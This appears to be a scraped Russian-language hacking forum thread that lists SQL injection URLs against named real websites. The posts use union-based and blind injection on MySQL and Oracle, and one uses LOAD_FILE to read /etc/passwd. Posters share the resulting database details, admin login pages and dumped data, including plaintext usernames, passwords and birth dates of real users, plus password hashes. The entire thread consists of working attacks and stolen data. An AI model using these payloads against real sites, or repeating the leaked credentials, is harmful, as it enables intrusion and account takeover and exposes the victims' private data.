paramountcenter.org Code: http://www.paramountcenter.org/screen.php?id=-323+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16-- 5.0.67-log PR: 5
SuperADSL Code: http://adsl.superonline.com/modem_detail.php?id=-11'+union+select+1,2,concat(user(),0x3a,database(),0x3a,version()),4,5,6,7,8/* user(): [email protected] database(): superadsl version(): 5.0.41-log 4 PR=5 table: user поля: id:ad:username:sifre:durum table: users поля: Id:u_status:so_anket:so_anket_log:so_anket_request Code: http://www.stellenlinks.ch/link.php?id=-11'+union+select+1,2,3,4,5,concat(user(),0x3a,database(),0x3a,version()),7,8,9,10/* user(): web788@localhost database(): usr_web788_1 version(): 5.0.45 PR=6
http://www.marinarii.ro/nave-de-istorie.php?id=-5+UNION+SELECT+1,2,concat_ws(0x3a,version(),database(),user())--&name=Bricul_Mircea_ Database Version: 5.0.67-community-log Database name: marinari_marinarii User name: marinari_db@localhost
Code: http://www.corazonhealth.co.uk/screen.php?id=-3+union+select+1,AES_DECRYPT(AES_ENCRYPT(version(),73),73),3,4,5/* 4.1.11 вывод во флеш о_О
www.tabsheaven.net довольно известный в сети сайт с гитарной табулатурой) юзер - gh123400@localhost бд - gh123401db, gh123400db версия MySQL - 5.0.22 таблицы из бд gh123400db: таблицы из бд gh123401db:
drivermagazine.ca - PR3 Code: http://drivermagazine.ca/phpcode/web/view_article.php?art_id=-401+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26-- DB_Ver : 4.1.22-standard DB_User: driverma_driver@localhost DB : driverma_dm База данных юзеров:member Интересные поля: email,password Запрос для примера: Code: http://drivermagazine.ca/phpcode/web/view_article.php?art_id=-401+UNION+SELECT+1,2,3,concat_ws(0x3a,email,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+members+limit+0,1-- Войти можно тут: Code: http://www.drivermagazine.ca/phpcode/web/sub.php
Oracle http://neuron.md/catalog.php?param_ctid=20738¶m_sctid=-20741+union+select+null,null,to_char(user)+from+sys.dual-- user : WEBNEURON http://neuron.md/catalog.php?param_ctid=20738¶m_sctid=-20741+union+select+null,null,TABLE_NAME+from+SYS.ALL_TABLES+WHERE++ROWNUM+%3C=+5-- крутите.... http://neuron.md/catalog.php?param_ctid=20738¶m_sctid=-20741+union+select+null,null,chr(207)||chr(240)||chr(232)||chr(226)||chr(229)||chr(242)||chr(32)||chr(226)||chr(241)||chr(229)||chr(236)||chr(32)||chr(238)||chr(242)||chr(32)||chr(195)||chr(238)||chr(240)||chr(229)||chr(226)||chr(224)||chr(32)||chr(33)||chr(33)||chr(33)+from+dual-- Улыбнитесь
improvemyhome.ca - PR5 Code: http://www.improvemyhome.ca/article_detail_page.php?art_id=254149&type=-2222+UNION+SELECT+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6/* DB_Ver : 5.0.41-log DB_User : snapsync@localhost (имеет файловые привилегии, читать файлы по крайней мере точно может) DB : renovons_ag Пользователи из mysql.user root:745ae3fb13dd6c1a root:358b5bdd4c573f2d root:358b5bdd4c573f2d snapsync:0285e4f0029d984d backup:4906447b2de0dc5d
Художественная Галерея «Виктория» Code: http://gallery-victoria.ru/painters'+and+1=0+union+select+1,2,3,4,5,6,7,8,9,0--+/
options.bc.ca - PR4 Code: http://www.options.bc.ca/program_info.php?cat_id=10&program_id=23000%27+UNION+SELECT+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/* DB_Ver : 4.1.22-standard DB_User : options_db@localhost DB : options_db1 cornerstoneacademy.bc.ca - PR4 Code: http://www.cornerstoneacademy.bc.ca/certification.php?cat_id=7&cert_id=24+UNION+SELECT+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10/* DB_Ver : 5.0.27 DB_Ver : cornerstone@localhost DB : cornerstone
Blind http://www.autotrafic.ro/vanzari/anunt1750+AND+ASCII(SUBSTRING((select+concat_ws(0x3a,version(),user(),database()) ),4,1))=46-- /Vand_Porsche_924.html Version: 5.0.51a-3ubuntu5.1 Database : autotraficv2 User : autotrafic@localhost 2 Jokester- sorry
Еще один крупный проект -) PageRank = 7 Database Version: 5.0.45-log Database name: ecdl User name: [email protected] Пользователи username : password : emai : Manfred.Wolfslast.1959-08-12: web1206at : [email protected] : Alexander.Kappel.1974-04-12: 19ilvy74 : [email protected] : Markus.Krojer.1980-10-20 : 474021 : : Michael.Krojer.1974-05-13: nokia74 : [email protected] : KARL.SCHUH.1950-11-01 : 994868 : И так пол лимона -) Администраторы id : username : password :38: daniela : 08puesmk* :3: resch : gcoldcexj901 :28: livia : barca123 :37: karin : kImqiTUc :27: rupert : vanhalen1966 :26: Malgorzata : mis1919 :21: kilian : schwechat02 :24: manuela : chicco202 :23: angelika : 1812dominik :20: lancelot : Stiegl :19: andreas : alaemmer
http://www.ire x.md/viewdetale.php?id=-4+union+select+1,version(),3,4,5,6,7,8,9,10,11,12--&lang=eng 4.1.22 http://www.hq class.md/company/index.php?f=-14796+union+select+1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+information_schema.tables+limit+83,1--&l=ru&ses=prodserv&viewps=5437 83 tablits versia 5
[email protected]hc:5.0.51a-community-log:2:0hcphc:23f043c45f949381613ba2dd167891b4 23f043c45f949381613ba2dd167891b4 = passhealth789 А админку не нашел((
http://www.agriminternational.com/acc.php?lang=1&id=-6%20union%20select%20concat_ws(0x3a,user,pass)%20from%20admin-- Админка http://www.agriminternational.com/admin Имя пасс Admin: admin
Welcome to the Jameson Dublin International Film Festival Code: http://www.jdiff.com/event_live.php?id=13'+union+select+1,2,concat(version(),0x3a,database(),0x3a,user()),4,5,6,7/* user(): IFFUSR@LOCALHOST database(): DUBLINIFF_COM version(): 5.0.27 PR=5 тИЦ=10 table test_admin: Code: http://www.jdiff.com/event_live.php?id=13'+union+select+1,2,concat(id,0x3a,username,0x3a,password),4,5,6,7+from+test_admin/* HTML: 1:ADMIN:ADMINPWD1 table mcc004_user: Code: http://www.jdiff.com/event_live.php?id=13'+union+select+1,2,concat(id,0x3a,user_login,0x3a,user_pass),4,5,6,7+from+mcc004_wp_users/* HTML: 1:ADMIN:$P$BWSEILDVQWFDR4VRWWLPQRYW3PCKEI. 2:ANDREW KENNEDY:$P$BXXUBZWP6V9NXGJFXCSR5F2RL5WRQG1 админка: Code: http://www.jdiff.com/admin/login.php OSAS Stallion Auction Code: http://www.osasauction.com/item.php?id=-3+union+select+1,2,concat(user(),0x3a,version(),0x3a,database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32-- вывод в title user(): peimatin_auct3@localhost database(): peimatin_auct3 version(): 5.0.75-community-log table PHPAUCTIONXL_adminusers: HTML: porchak:832d376cb74fb47ed113debe9b5f24d9 table PHPAUCTIONXL_users: HTML: 1:jayport:bf6a89d3935ceb0ed798149d2ac967ed 2:auctionstaff:bf6a89d3935ceb0ed798149d2ac967ed 3:colt12:3e1f9e1da3b65fa102d3a6589bf409b6 4:Breeder:4160c64318079c955543d5a14ea3a27b 5:stefbo:bcea5fde6a21c943838b2d5a1784a2e4 6:chanthor:cda8b830510c5c1d0e55f8e147c374a7 7:jamesinc:c1a9eed41e121557ead9156201421d41 админка: Code: http://www.osasauction.com/admin/ Ocean City Golf - Golf Packages Code: http://www.ocgolf.com/packages/packagers.php?id=-13'+union+select+concat(user(),0x3a,database(),0x3a,version())/* user(): golf@localhost database(): golfdb version(): 4.0.24-standard-log PR=5 тИЦ=10 з.ы интересная sql inj
http://www.internationalfellowships.org.uk/host.php?host_id=-1%20union%20select%201,2,3,group_concat(table_name),5,6,7,8,9%20from%20information_schema.tables-- 5.0.67
http://www.e-travel.ie HTML: http://www.e-travel.ie/sp_page.php?id=-11+union+select+1,2,3,4,concat_ws(0x3a3b,version(),database(),user()),6,7,8,9,0,1 5.0.45-log:;etravelertyu:;etravelusr@localhost Пассы лимитом http://www.e-travel.ie/sp_page.php?id=-11+union+select+1,2,3,4,concat_ws(0x3a,Admin_Name,Admin_Pass),6,7,8,9,0,1+from+Administrators+limit+0,1 Audrey:rUkhf.0RR7tNk хэш доселе невиданый =) Логинка http://www.e-travel.ie/cruise_club_login.php
http://www.rugby.ro/index.php?pag=pages&id=191+UNION+SELECT+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11+LIMIT+1,1-- Database Version: 5.0.26 Database name: rugby_ro2 User name: root@localhost читаем http://www.rugby.ro/index.php?pag=pages&id=191+UNION+SELECT+1,2,LOAD_FILE(0x2F6574632F706173737764),4,5,6,7,8,9,10,11+LIMIT+1,1-- в скуле выводятся бд всех сайтов на хостинге
